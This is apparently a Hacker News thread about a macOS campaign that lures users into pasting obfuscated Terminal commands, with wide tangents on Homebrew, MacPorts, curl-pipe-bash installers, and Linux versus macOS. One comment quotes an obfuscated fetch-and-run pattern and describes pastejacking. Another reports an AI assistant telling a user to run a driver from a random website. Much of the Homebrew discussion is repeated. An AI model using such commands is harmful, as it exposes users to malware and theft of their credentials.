I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
Any decent project should have a way to install without Homebrew. It's really not necessary.
> and couldn't upgrade because Apple didn't support my hardware anymore
I'd classify that as an Apple problem rather than a Homebrew problem. If Apple themselves cannot be arsed to support an OS version, why would a volunteer project take on such a challenge?
For every piece of software I've fetched using Homebrew, there's a "compile from source" option available on Github or some other source repo.
It wouldn’t cost Homebrew folks much to add a flag to skip dependency version checking which would solve most issues with using older macOS. But they don’t want to, and have closed all issues asking for it as wontfix.
Seems like good enough a reason for them not to do it.
Their tooling is open-source, surely the few people still using unmaintained versions of macOS can create a `LegacyHomeBrew/brew` repository with patches for old macOS versions? It would also be a good place to stuff all the patches and workarounds that may be necessary to support old macOS versions.
They said they don’t want that [1]. It’s not just me, several people have asked for it. Maintaining an extra fork just for that is also out of the question for most people.
Was gonna say the same thing. There are tons of projects that support older unsupported OS versions or even different platforms. Whether that's macOS, Windows, or older versions of the Linux kernel.
>I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
How old was it? With macOS "running an old version" is not really a viable or advisable path beyond a certain point. Might be something people want to do, might it a great option to have, but it's not very workable nor supported by Apple and the general ecosystem.
>Any decent project should have a way to install without Homebrew. It's really not necessary.
We don't install homebrew because it's necessary, but because it's convenient. No way in hell I'm gonna install 50+ programs I use one by one using the projects' own installers.
Besides, if "Homebrew dropped support" is an incovenience, "manually look for dozens of individual installers or binaries, make sure dependencies work well together, build when needed, and update all that yourself again manually" is even more of an inconvenience. Not to mention many projects on their own drop support for macOS versions all the time, or offer no binaries or installers.
Or use Homebrew on the old OS with TigerBrew (https://github.com/mistydemeo/tigerbrew), but people online suggest MacPorts, not only because it has first-party support but also because it’s apparently better designed.
I'm fine with homebrew not supporting whatever versions they choose.
I think GP's issue is forcing the use of homebrew for what seems like a rather trivial install. Just make the binary easily downloadable. It's not like you can't open the curled script to see what it fetches and do it yourself. It's just that having to jump through this useless hoop is annoying.
My mac is running the latest version of Tahoe but I never liked homebrew. You can bet I won't install it just for one app.
Homebrew really helps when you want to install more than one app... And you want to keep them updated... And you want to easily delete some of them at some point.
Managing the install lifecycle with one set of commands for multiple apps is why I love Homebrew
Apple controls these computers? I am using Linux myself; I compile from source though. To me it would seem super-strange to use an operating system where a private entity decides what it wants to do.
The people who pay for operating systems are paying for a private entity to decide what the operating system should do. They're paying for someone to compile it from source and get it to run on their computer and maintain it.
That's the whole point. Paying someone for that thing you also know how to do so they can consider that problem solved and focus on the things they know how to do.
Not sure where you're getting this from, but the latest MacOS works on devices from 2019 so it's at least 6 years of support. And homebrew supports versions from macOS 14 fully (and some support up to 10.15) which means full support for 2018 devices and potentially even devices from 2012 will work.
More than six. 2019/2020 Intel Macs get Tahoe 26.0 + about three years of security patches for Tahoe. The last Intel Mac will be out of support in probably late 2028.
The iMac Pro is a 2017 computer, although it was sold until 2021. So given that it runs Sequoia, that's anywhere from six to ten years of OS support. OCLP will probably figure out how to patch Tahoe for the iMac Pro soon enough, but until then, you can rejoice in the fact that you don't have to run Tahoe.
It could be worse -- at least you didn't spend tens of thousands on a 2019 model Intel Mac Pro in 2023. (Yes, they still sold them, and owners of those will be SOL in 2028. That's probably the worst OS support story in recent Apple history, and it's for some of their most expensive machines)
Actually you are correct. I've been following the HN threads about Tahoe and even watched a few YouTube videos and could only facepalm.
But then again I'll get rid of the iMac Pro this year. I'll have technicians butcher it and salvage whatever they can from it -- I suspect only the SSD will survive -- and will then tell them to hollow it out and put an R1811 board inside it so I can use it as a proper standalone 5K screen. I don't care about Macs anymore, they limit me too much and I can't maintain multiple Linux machines just when I figure I would want to do something that Macs can't do (like experiment with bcachefs or ZFS pools and volumes and snapshots for my continually evolving backup setup).
Fair. The screens are really beautiful, absolutely worth reusing if possible.
I'll be decommissioning 40+ 2020 27" iMacs this year (i9-9900, 32 GB) and it's such a shame to see so many great displays and otherwise functional and plenty fast computers become, essentially, e-waste.
I agree, it is a huge shame. And the R1811 boards are more or less 300 EUR (~360 USD). Not many companies would agree to spend $360 on a near-future e-waste, per device, just to be able to extract the high-quality display. True shame.
But I've learned my lesson. While Apple computer served me well from 2019 to 2026, macOS gets less and less usable for me and the bunch of things I want to be able to do on it only increases, and its appeal only decreases (not to mention the very justified OCD I get when I look at how much crap is running 24/7 on it!).
The iPhone stays, though I wonder for how long more. But the Mac will be on its way soon enough.
Why not use MacPorts, which currently supports all the way back to Leopard, has far more packages than Homebrew, has a better design, and was created by the creator of the original FreeBSD ports system who also worked on Apple's UNIX team?
The ubiquity of Homebrew continues to confound me.
Homebrew and MacPorts unfortunately do not fit to macOS installation layout very well anymore. Packages installed outside usual places create a lot of headaches during updates.
I also do not prefer to use these for the last 16+ years, and not planning to do so.
I wish mac users would stop using homebrew and use a real package manager with actual dependency management.
At the very least, replace homebrew with something like devbox which has `devbox global` for globally managing packages, it uses nix under the hood, and it's probably the simplest most direct replacement for homebrew.
I don't agree this is an issue and I'll tell you why: Homebrew isn't responsible for keeping the system functional like apt or pacman, it's a supplemental thing. I've also found it's useful in this capacity on Linux specifically with LTS distros, I can get the latest fzf or zoxide or whatever without having to add some shady repo.
This is how I see/use brew as well, and being able to just blow the directory away anytime and start over if need be is nice.
It's not a "system" package manager, nor was it ever meant to be. Its supplemental. I've also found it valuable on the various immutable linux distros.
I use MacPorts because of older versions of Homebrew having a weird and insecure design. [1] I think some of those design issues may have been fixed, but I’m wary of Homebrew.
It's not necessary because Mac applications shouldn't have any dependencies other than the OS. (Whatever additional libraries they use should be included.) This should also be true of basic developer tools. Once you're in a particular ecosystem, tools like deno, npm, or uv can handle their own dependencies.
Alternatively, you could do development in a container and use apt-get there. That's probably safest now that we're using coding agents.
I wish the mac users would switch to a real OS, linux, so that software companies would release linux versions of stuff first.
Codex, Claude Desktop, etc etc all starting out as "macOS exclusive" feels so silly when they're targeting programmers. Linux is the only OS a programmer can actually patch and contribute to, and yet somehow we've got a huge number of developers who don't care about having a good package manager, don't care about being able to modify their kernel, don't care about their freedom to access and edit the code of the software they rely on to work...
It's depressing how much of the software industry is just people on macbooks using homebrew to install a newer version of bash and paying $5 for "magnet" to snap windows to the corners since their OS holds them in a prison where they can't simply build themselves a tiling window manager in a weekend.
The OS is core to your tools and workflows, and using macOS cedes your right to understand, edit, and improve your OS and workflows to a company that is actively hostile to open source, and more and more hostile to users (with a significant increase in ads and overly priced paid services over the years).
Anyway, yeah, homebrew sucks. At least nix works on macOS now so there's an okay package manager there, but frankly support for macOS has been a huge drag of resources on the nix ecosystem, and I wish macOS would die off in the programming ecosystem so nix could ditch it.
I harbor similar sentiments, but I understand why OpenAI, Anthropic, Zed, etc begin with a macOS version. They're able to target a platform which is a known quantity and a good jumping off point to Linux.
I'm writing software for Linux myself and I know that you run into weird edge case windowing / graphical bugs based on environment. People are reasonably running either x11 or wayland (ecosystem is still in flux in transition) against environments like Gnome, KDE, Sway, Niri, xfce, Cinnamon, labwc, hyprland, mate, budgie, lxqt, cosmic... not to mention the different packaging ecosystem.
I don't blame companies, it seems more sane to begin with a limited scope of macOS.
The problem is that right now I have to choose the lesser of 2 evils. I hate what W11 has become. I only use it for games at the moment and the only reason is that some games Apex/BF6 do not run under proton because of their anticheat.
And I also hate what modern Macos is heading towards. I'm still ignoring/canceling the update on both my devices for the new "glass" interface.
And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
Truth be told I just want to have my mbp running Linux. But right now it's not yet where it needs to be and I am most certainly not smart enough to help build it :(
> And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
I'm using a decade old thinkpad running linux and it is definitely 'doing it for me'. And I'm not exactly a light user. Power efficient mac hardware should be weighed against convenience and price. The developer eco-system on Linux is lightyears ahead of the apple one, I don't understand why developers still use either Windows or the Mac because I always see them struggle with the simplest things that on Linux you don't even realize could be a problem.
Other OSs feel like you're always in some kind of jailbreak mode working around artificial restrictions. But sure, it looks snazzy, compared to my chipped battle ax.
> And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
Are you talking about the battery? I bought a T16 AMD a month ago with the 86Wh battery and it lasts between 8 and 12 hour depending on the usage. Not as much as a macbook but enough to not worry too much about it. New intel ones are supposed to be much better on power efficiency.
It's off course one level bellow on the mac on that regard (and others maybe too), but if you want to use linux I think the trade-off is worth it.
It's Apple, not the users, that need to make that switch in the first instance. I'd love to use Linux again but I'm not leaving Apple hardware for it, or accepting poor software support for recent hardware.
I admit I love the mbp hardware, but I can't stand macos anymore. So when my work computer was up for replacement, I didn't think twice and went with a PC, the latest thinkpad p14s. Everything works out of the box on Linux.
Is it as nice as a mac? No, especially the plastic case doesn't feel as nice under the hands as a mac's aluminum, the touchpad is quite good but worse than a mac's, and there are some gaps around the display hinge. But the display itself is quite nice (similar resolution, oled, although not as bright as a mac's), it's silent and it's plenty fast for what I do. I didn't pay for it, so I don't directly care about this point in this situation, but it also cost around half of what an equivalent mbp would have cost.
I also haven't tried the battery life yet, but it should hold at least as well as my 5-yo hp elitebook, which still held for around 5 hours last year. I basically never use it for more than an hour unplugged, so battery life is low on my priorities.
I dunno, I'm pretty happy with my thinkpad. Even if I could run Linux flawless on a macbook (which you can't unfortunately) I'd still take the thinkpad hardware over a macbook.
A macbook air is 1.25kg, and my thinkpad is 910g, and I can really feel that difference. The thinkpad keyboard also feels ever so slightly better too... and Linux working well is worth more than pretty much anything else.
It's ok, Apple knows this and will lock it's OS down to an iPhone like OS step by step until you're boxed in a nice little prison, and you'll accept it.
Also you'll pay them 30% on every transaction you do on said computer.
I'd say support for linux has improved an incredible amount compared to 5-10 years ago. I'm often pleasantly surprised when ever a linux version of something is available because I'm used to not expecting that haha.
MacPorts has existed since 2002 and was invented by Jordan Hubbard, who created the original FreeBSD ports system and was also employed on Apple's UNIX team.
The package management story on Linux is hideously bad. The next generation replacements are all over the place (do I use snaps? Flatpak?). No one is going to learn Nix if it means you need to become a programmer just to install something.
The graphics story on Linux also sucks. I recently tried to convert my Windows gaming machine to Linux (because I hate W11 with a burning passion). It does work, but it’s incredibly painful. Wayland, fractional scaling, 120+ Hz, HDR. It’s getting better thanks to all the work Valve etc are putting in, but it’s still a janky messy patchwork.
MacOS just works. It works reliably. Installing things is easy. Playing games is easy. I’m able to customize and configure enough for my needs. I love it and I hope it sticks around because there is no way in hell I would move my work machines over to Linux full time.
What's wrong with those? I don't have a single screen which does 120 Hz + HDR, but I'm typing this on a 120 Hz laptop, with variable refresh rate, at 125% scaling, and everything works great with Plasma (haven't tried anything else). I also have an external HDR screen, but it only does 60 Hz. It works great, too, doing HDR on it but not on the laptop screen (running at the same time, of course). They also run at different scaling (125% and 100%).
Now I don't know how to confirm that VRR is actually doing anything, but I can tell there's a difference between setting the monitor to 60 and to 120 Hz. HDR on the other screen also produces a clear difference.
This is all running from integrated intel graphics, maybe with other GPUs it's more of a crapshoot, no idea.
Huh? Homebrew supports and frequently uses dependencies between formulae. It’s a bit janky around upgrades in my experience, but you’re going to have to clarify what you mean.
MacPorts was created by the creator of the original FreeBSD ports system who was also an Apple employee. It ought to be everyone's first choice for package management on macOS.
That wouldn't really help, it could be more naughty and use pastejacking so you don't even realize what's happening. That might end up catching a lot of people because as far as i know by default bash doesn't use bracketed paste, so you think you're copying a real command and it ends up sending your secrets before you know what happened.
Disabling JS + bracketed paste seems to be the only good solution.
Btw OP article uses a weird setup, why would they use `bash -c "$(curl $(echo qux | base64))"` instead of just "curl | bash"
It's not really any different than downloading a binary from a website, which we've been doing for 30 years. Ultimately, it all comes down to trusting the source.
>> Attacks like this are not helped by the increasingly-common "curl | bash" installation instructions ...
> It's not really any different than downloading a binary from a website, which we've been doing for 30 years.
The two are very different, even though some ecosystems (such as PHP) have used the "curl | bash" idiom for about the same amount of time. Specifically, binary downloads from reputable sites have separately published hashes (MD5, SHA, etc.) to confirm what is being retrieved along with other mechanisms to certify the source of the binaries.
Which is the reason why it's better to actually cryptographically sign the packages, and put a key in some trusted keystore, where it can actually be verified to belong to the real distributor, as well as proving that the key hasn't been changed in X amount of days/months/years.
Still doesn't address the fact that keys can be stolen, people can be tricked, and the gigantic all-consuming issue of people just being too lazy to go through with verifying anything in the first place. (Which is sadly not really a thing you can blame people for, it takes up time for no easily directly discernable reason other than the vague feeling of security, and I myself have done it many more times than I would like to admit...)
Which is why package managers with well-maintained repositories are the civilized solution to software disruption. Unfortunately the Linux world has been dedicating a lot of energy to making Windows-style "download and run the exe" possible on Linux.
>Which is why package managers with well-maintained repositories are the civilized solution to software disruption.
How does that model work with distros like debian, where they freeze package versions and you might not get claude code until 2027 (or whenever the next release is)?
If the debian maintainers don't align with your preferences you can:
1. Create your own apt repository with newer software, and install from that. It's easy to package things, you can share the repository with trusted friends, running linux with friends is fun.
2. You can switch to a distro, like NixOS or Arch, which values up-to-date software more than slow stable updates.
Debian does seem to be more aligned with mailservers and such, where updates can be slow and thoughtful, not as much with personal ai development boxes where you want the hot new ai tool of the week available asap.
... Either way, learning to package software correctly for your distro of choice is a good idea, it's fun to bang out a nix expression or debian package when you need to install something that's not available yet.
I've heard this time and time again from new Linux users: "I don't want to learn the command line, I just want to be able to install and run whatever I want"
On Mac binaries need to be signed and notarized and Apple could stop the spread of the malware once it's identified or even detect it before notarizing it.
I've downloaded and installed too many packages where the developers didn't bother with this, but I uncritically went to Mac's security settings to let it do its thing anyway.
I don't know if developer utilities can be distributed through the app store, but they should be so that Apple can review them properly. Criticisms aside, the iOS App Store and the iOS security model has been the best thing for software security (especially for lay-people), ever.
Apple controlling CLI utilities is a bad supposedly good idea.
They can’t stop themselves from tightening their grip ever tighter, and always want to ensure you have no functionality above what they deemed sufficient.
All the homebrew packages have checksums and are versioned in git, so if the upstream website is compromised and a malware installer is put in place of the package, `curl | bash` will just install the malware, while `brew` would start erroring out and refuse to install after downloading something with a different checksum.
You also get an audit log in the form of the git repo, and you also ensure everyone's downloading the same file, since `curl | bash` could serve different scripts to different IPs or user-agents.
I don't think brew does proper build sandboxing, so like `./configure.sh` could still download some random thing from the internet that could change, so it's only a bit better.
If you want proper sandboxing and thus even more security, consider nix.
Civilization is about cooperating with your fellow man to build great things, not bowing to the feudal lord Apple Inc.
A truly civilized person would use Linux, OpenBSD, etc, a free operating system where they may contribute fixes for their fellow man without having to beg at the boots of the single richest company on the planet with radar numbers asking for fixes from on high.
Maybe tools like https://github.com/vet-run/vet could help with these projects that would rather you use their custom install script instead of complying to distro-specific supply chains.
MacPorts, of course, features an actual .pkg installer, as well as doing pretty much everything else better, and having more packages, and existing first.
I use brew but willing to try out Macports.
How come the package install instructions seem to require sudo under macports? Does that not carry more risk during the install ?
> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,
I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g: reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 app for a link unshortener app.
In any case, there have been malicious sites that return different results based on the headers (e.g: user agent. If it is downloaded via a user-agent of a web browser, return a benign script, if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.
> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands
Tale as old as time. Isn't there an attack that was starting to get popular last year on Windows of a "captcha" asking you to hit Super + R, and pasting a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long, time. I remember Facebook and some other websites used to have a big warning in the developer console, asking not to paste scripts users found online there, as they are likely scams and will not do what they claim the script would do.
---
Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image, (and the image being the same width of the paragraph text) it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.
The GitHub links are one of the nastiest Malware I ever encountered in my life!
I steals your Apple Keychain, all your "Safe" Passkeys, your Google Chrome "Saved Passwords", even your KeePass Database!
Login and security is still not sufficiently solved with attack-proofs for the most important things in life like your Bank, Email, Wallets, Social Logins.
Your "logged-in Sessions" also get stolen! It's unbearable that most cookies expire in months "ON THE SERVER SIDE"! You have no control and can't log the attacker out!
It happened to me, when I was in China and searched for ExpressVPN, because the main website didn't load forever, the GitHub link seemed like an alternative.. damn.. I changed my Google Password 5 times and the attacker was still able to log-in, it was so devastating! I had to change my email passwords multiple times too.
Sessions are what make logins valid and this is the weakest link of all. I wish Sessions used Off-The-Record encryption with One-Time-Pads, such that each acccess requires a new key, that can only be derived with a valid reply that makes safe that the attacker can be logged out safely.
You have to consider your machine and all others you connected to to be compromised. Time to reinstall every device with new accounts and passwords. With unused usb sticks and images downloaded from another network you were never connected to.
Did you download anything? A bad link isn't going to do all of that, unless some NS actor is dropping zero days on random people via Google search. You most likely downloaded a trojan with a a luma stealer, and your computer is probably still compromised.
This is very close to something that happened to a friend of mine. They were trying to follow a MoltBot installation guide, but clicked on a different link that looked legitimate. That page instructed them to paste a command into Terminal.
After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign.
But for someone who is non technical might have ran with it.
> After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign.
From what understand of MoltBot, I would expect it to ask for a lot of permissions. I guess maybe they are prompted closer to configuration time in the actual app.
You're referring to [Sandboxing] Mandatory Access Controls [0]. Windows doesn't implement MAC in the same way, instead using Mandatory Integrity Controls [1].
Windows can implement these things as much as they like, but if you paste a command into CMD.exe, it can access your files with no popup like MacOS gives you.
In Win, access to files are controlled by ACL when NTFS is used (dating back to NT 3.1 with NTFS). So it depends on which user runs a process.
Basic hygiene is very simple: never run as Administrator. Create and use a regular user or poweruser group user. It's similar to a regular linux practice. Use Administrator account when needed only.
GP is talking about isolation inside the current user. Recent macOS versions ask before allowing a program to access files inside Documents, Desktop, etc. Whether that helps or not is debatable, but it’s not quite the same as what Windows ACLs do out of the box. To achieve the same on Windows, one would have to run the program as a different user to which they’d selectively grant access to the folders inside their profile.
It's not enabled by default, though. Enabling it by default would probably break just about every Windows program out there and like UAC on Vista, everyone would turn it off immediately.
I reported one of these recently. It was also related to clearing space, specifically system files. It was the second top sponsored link and presented as an Apple support page. The styling was very convincing, with the only giveaway being the url.
A day later my parents called me very stressed out about a popup on my mother’s iPhone saying she had been hacked. I asked them to take a screenshot, and again it was a website that was styled to look like a modal on top of a iOS Settings app page. With the new ui this was extremely effective, as the page title is just a tiny thing down the bottom in scrolled state.
I don’t know what is going on, but I’d assume the problem is AI moderation.
Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspect every call to exec and fork that occur in the kernel and also inspect those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. Will stop keychain attacks. Infostealing (as they can also get every file system op as they are happening in the kernel).
Gatekeeper and Xprotect are good, but there's only so much they can do.
Antivirus programs will run on PowerShell scripts, VBScript files, JScript files, and all other kinds of automation on Windows.
The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter, the infection stage should've been caught by anti malware rather than permission prompts.
Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.
No, that narrative died around 2010. The existence of malware targeting Macs has driven many macOS security improvements since, many of which are taken personally by HN readers.
XProtect (Apple's built-in antimalware) is usually all you need, as long as you're at least somewhat savvy (and sometimes even if you aren't). I believe installing any additional antimalware on a Mac is a waste of resources.
It seems most anti-malware is the equivalent of the TSA - security theatre that wastes your time and attention, catching plenty of water bottles but not the real stuff.
If you prepare a ligit-looking web page where you instruct people to download and run malware, we'd better learn more on security and caution before blindly follow those directions.
Why should it be Google's (or Bing's) duty to filter those out?
Why should Google be responsible for content they accept money to promote on their website, and then elect to disguise as "natural" search results specifically in order to trick you into clicking them without realizing they're ads?
> Why should it be Google's (or Bing's) duty to filter those out?
Google intentionally disguises ads as search results, and even lets advertisers present a fake URL. When the system's purpose is to profit from tricking inattentive users, I think they should take on some liability for the outcome of what they're tricking people into doing.
Not to say that better teaching security isn't also a good idea.
It may not be their duty to filter it out, but it should definitely be their duty to not take money to bump it to the top of their results. Let the algorithm dump random unlinked medium posts on the 5th page where they belong
Actually… I think this be solved by AI answers. I don’t look up commands on random websites, instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLMs.
What we used to have, 15 years ago, was a really well functioning google. You could be lazy with your queries and still find what you wanted in the first two or three hits. Sometimes it was eerily accurate and figuring out what you were actually searching for. Modern google is just not there even with AI answers which is supposed to be infinitely better at natural language processing.
I think that played a somewhat smaller role than Google seemingly gradually starting to take its position for granted and so everything became more focused on revenue generation and less focused on providing the highest quality experiences or results.
Beyond result quality it's absurd that it took LLMs to get meaningful natural language search. Google could have been working on that for many years, even if in a comparably simple manner, but seemingly never even bothered to try, even though that was always obviously going to be the next big step in search.
We used to have an endless supply of new search engines, so "SEO" was not viable. Then Google got a monopoly on search, DoubleClick reverse-acquired Google, and here we are.
Yesterday I was debugging why on Windows, my Wifi would randomly disconnect every couple hours (whereas it worked on Linux). Claude decided it was a driver issue, and proceeded to download a driver update off a completely random website and told me to execute it.
Don’t the LLMs get their information from these random websites? They don’t know what is good and what is malware. Most of the time when I get an AI answer with a command in it, there is a reference to a random reddit post, or something similar.
LLMs will allow Mal to sneak in backdoors in the dataset. Most of the popular LLMs use some kind of blacklisting instead of a smaller specific/specialised dataset. The latter seems more akin to whitelisting.
Could the dataset of the LLMs that made these recommendations have been poisoned by, let's say, a Honeypot website specifically designed to cause any LLM that trains on it to recommend malware?
lol, is this serious? The final straw with Mac for me was when I accidentally hit “No” when asked if I wanted to give my terminal access to the file system. All of a sudden I was starting my work day without a working terminal. Obviously there was a solution, probably an easy one, but I didn’t even look for it.
> Obviously there was a solution, probably an easy one, but I didn’t even look for it
It's hard to take this seriously. It's the most obvious setting possible. Settings > Privacy & Security > Full Disk Access > tick the apps you want to have it.
What's even the complaint here? That Mac has solid app permissions, but you can't be bothered to open the settings?
I said it was likely an easy solution. Glad to see my intuition was correct!
I also said it was the “final straw”. No worries at all if you’re not familiar with that expression. It means that there were lots of similar slights previously, and that the event I mentioned, while minor, was the one that finally pushed me to make the decision I made.
> No worries at all if you’re not familiar with that expression.
I'm not contesting that it was the final straw, I'm contesting it was a straw at all. "I want to change a setting but am too lazy to open the settings" is not an argument against Macs, it's a piece of evidence that you don't know how to operate a computer.
> I also said it was the “final straw”. No worries at all if you’re not familiar with that expression. It means that there were lots of similar slights previously, and that the event I mentioned, while minor, was the one that finally pushed me to make the decision I made.
This sort of patronizing assholery is childish and unbecoming. Your comment would've been better without it.
This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to do open a homedir, it's impossible.
I'm not sure letting a webapp access your home is a good idea. You're basically YOLOing random remote code to run on your machine. Maybe we can have it access some specific folder for its own data.
And then there's also Apple which won't allow functional web apps, lest it affects their app store 30% cut.
The web already has these APIs, it can be granted read-only permissions to designated directories. But the browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files". Because of that policy the API is not useful for the application of a space analyzer.
> browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files"
If you want to trash your system I believe nothing prevents you from giving Firefox full-disk access.
A solution would be to stop shipping macs with the terminal app\s. Computers are now used by a wide variety of people, some without technical knowledge, maybe a default switch on macOS that displays warnings on rather trivial attacks would help.
Attacks like this are not helped by the increasingly-common "curl | bash" installation instructions (e.g. the new "native" Claude Code install)...
Publish through homebrew like a civilized person, please!
I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
Any decent project should have a way to install without Homebrew. It's really not necessary.
> and couldn't upgrade because Apple didn't support my hardware anymore
I'd classify that as an Apple problem rather than a Homebrew problem. If Apple themselves cannot be arsed to support an OS version, why would a volunteer project take on such a challenge?
For every piece of software I've fetched using Homebrew, there's a "compile from source" option available on Github or some other source repo.
And if there isn’t that option explicitly highlighted, one can always look at the formula in homebrew for the instructions.
It wouldn’t cost Homebrew folks much to add a flag to skip dependency version checking which would solve most issues with using older macOS. But they don’t want to, and have closed all issues asking for it as wontfix.
> But they don’t want to
Seems like good enough a reason for them not to do it.
Their tooling is open-source, surely the few people still using unmaintained versions of macOS can create a `LegacyHomeBrew/brew` repository with patches for old macOS versions? It would also be a good place to stuff all the patches and workarounds that may be necessary to support old macOS versions.
Is this something you could add as a hot fix yourself and submit a PR for?
They said they don’t want that [1]. It’s not just me, several people have asked for it. Maintaining an extra fork just for that is also out of the question for most people.
[1] https://github.com/Homebrew/brew/issues/14217
Most volunteer projects do this.
Was gonna say the same thing. There are tons of projects that support older unsupported OS versions or even different platforms. Whether that's macOS, Windows, or older versions of the Linux kernel.
>I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
How old was it? With macOS "running an old version" is not really a viable or advisable path beyond a certain point. Might be something people want to do, might it a great option to have, but it's not very workable nor supported by Apple and the general ecosystem.
>Any decent project should have a way to install without Homebrew. It's really not necessary.
We don't install homebrew because it's necessary, but because it's convenient. No way in hell I'm gonna install 50+ programs I use one by one using the projects' own installers.
Besides, if "Homebrew dropped support" is an incovenience, "manually look for dozens of individual installers or binaries, make sure dependencies work well together, build when needed, and update all that yourself again manually" is even more of an inconvenience. Not to mention many projects on their own drop support for macOS versions all the time, or offer no binaries or installers.
Consider using MacPorts then, which only recently dropped support for Tiger and supports Leopard.
> and couldn't upgrade because Apple didn't support my hardware anymore.
If you really want, you may be able to upgrade the OS anyways with https://github.com/dortania/OpenCore-Legacy-Patcher.
Or use Homebrew on the old OS with TigerBrew (https://github.com/mistydemeo/tigerbrew), but people online suggest MacPorts, not only because it has first-party support but also because it’s apparently better designed.
Seems reasonable to not support an OS apple doesn’t support anymore
I'm fine with homebrew not supporting whatever versions they choose.
I think GP's issue is forcing the use of homebrew for what seems like a rather trivial install. Just make the binary easily downloadable. It's not like you can't open the curled script to see what it fetches and do it yourself. It's just that having to jump through this useless hoop is annoying.
My mac is running the latest version of Tahoe but I never liked homebrew. You can bet I won't install it just for one app.
Homebrew really helps when you want to install more than one app... And you want to keep them updated... And you want to easily delete some of them at some point.
Managing the install lifecycle with one set of commands for multiple apps is why I love Homebrew
Apple controls these computers? I am using Linux myself; I compile from source though. To me it would seem super-strange to use an operating system where a private entity decides what it wants to do.
The people who pay for operating systems are paying for a private entity to decide what the operating system should do. They're paying for someone to compile it from source and get it to run on their computer and maintain it.
That's the whole point. Paying someone for that thing you also know how to do so they can consider that problem solved and focus on the things they know how to do.
>get it to run on their computer and maintain it.... forever and ever and ever.
Oh way, that last part doesn't exist.
Gentoo?
Apple only supports for 3 years
Not sure where you're getting this from, but the latest MacOS works on devices from 2019 so it's at least 6 years of support. And homebrew supports versions from macOS 14 fully (and some support up to 10.15) which means full support for 2018 devices and potentially even devices from 2012 will work.
Sources:
https://eshop.macsales.com/guides/Mac_OS_X_Compatibility
https://docs.brew.sh/Installation#2
Well, Tahoe doesn't work on 2019 iMacs, and that chart shows the early 2020 Macbook Air isn't eligible either, so support duration varies a bit.
Which device was only supported for three years? Even the final Intel Macs are getting six.
More than six. 2019/2020 Intel Macs get Tahoe 26.0 + about three years of security patches for Tahoe. The last Intel Mac will be out of support in probably late 2028.
Well, my iMac Pro is not getting Tahoe. That's an Intel Mac. No idea why they figured that's their line in the sand.
The iMac Pro is a 2017 computer, although it was sold until 2021. So given that it runs Sequoia, that's anywhere from six to ten years of OS support. OCLP will probably figure out how to patch Tahoe for the iMac Pro soon enough, but until then, you can rejoice in the fact that you don't have to run Tahoe.
It could be worse -- at least you didn't spend tens of thousands on a 2019 model Intel Mac Pro in 2023. (Yes, they still sold them, and owners of those will be SOL in 2028. That's probably the worst OS support story in recent Apple history, and it's for some of their most expensive machines)
Actually you are correct. I've been following the HN threads about Tahoe and even watched a few YouTube videos and could only facepalm.
But then again I'll get rid of the iMac Pro this year. I'll have technicians butcher it and salvage whatever they can from it -- I suspect only the SSD will survive -- and will then tell them to hollow it out and put an R1811 board inside it so I can use it as a proper standalone 5K screen. I don't care about Macs anymore, they limit me too much and I can't maintain multiple Linux machines just when I figure I would want to do something that Macs can't do (like experiment with bcachefs or ZFS pools and volumes and snapshots for my continually evolving backup setup).
Fair. The screens are really beautiful, absolutely worth reusing if possible.
I'll be decommissioning 40+ 2020 27" iMacs this year (i9-9900, 32 GB) and it's such a shame to see so many great displays and otherwise functional and plenty fast computers become, essentially, e-waste.
I agree, it is a huge shame. And the R1811 boards are more or less 300 EUR (~360 USD). Not many companies would agree to spend $360 on a near-future e-waste, per device, just to be able to extract the high-quality display. True shame.
But I've learned my lesson. While Apple computer served me well from 2019 to 2026, macOS gets less and less usable for me and the bunch of things I want to be able to do on it only increases, and its appeal only decreases (not to mention the very justified OCD I get when I look at how much crap is running 24/7 on it!).
The iPhone stays, though I wonder for how long more. But the Mac will be on its way soon enough.
Why not use MacPorts, which currently supports all the way back to Leopard, has far more packages than Homebrew, has a better design, and was created by the creator of the original FreeBSD ports system who also worked on Apple's UNIX team?
The ubiquity of Homebrew continues to confound me.
+1
I guess I ran into the same thing. I try to install anything with Homebrew and it takes forever then breaks.
I went to macports because of that. Not looking back
The whole Apple ecosystem demands continually updates. You don't buy Apple and then complain about it.
Homebrew and MacPorts unfortunately do not fit to macOS installation layout very well anymore. Packages installed outside usual places create a lot of headaches during updates.
I also do not prefer to use these for the last 16+ years, and not planning to do so.
I wish mac users would stop using homebrew and use a real package manager with actual dependency management.
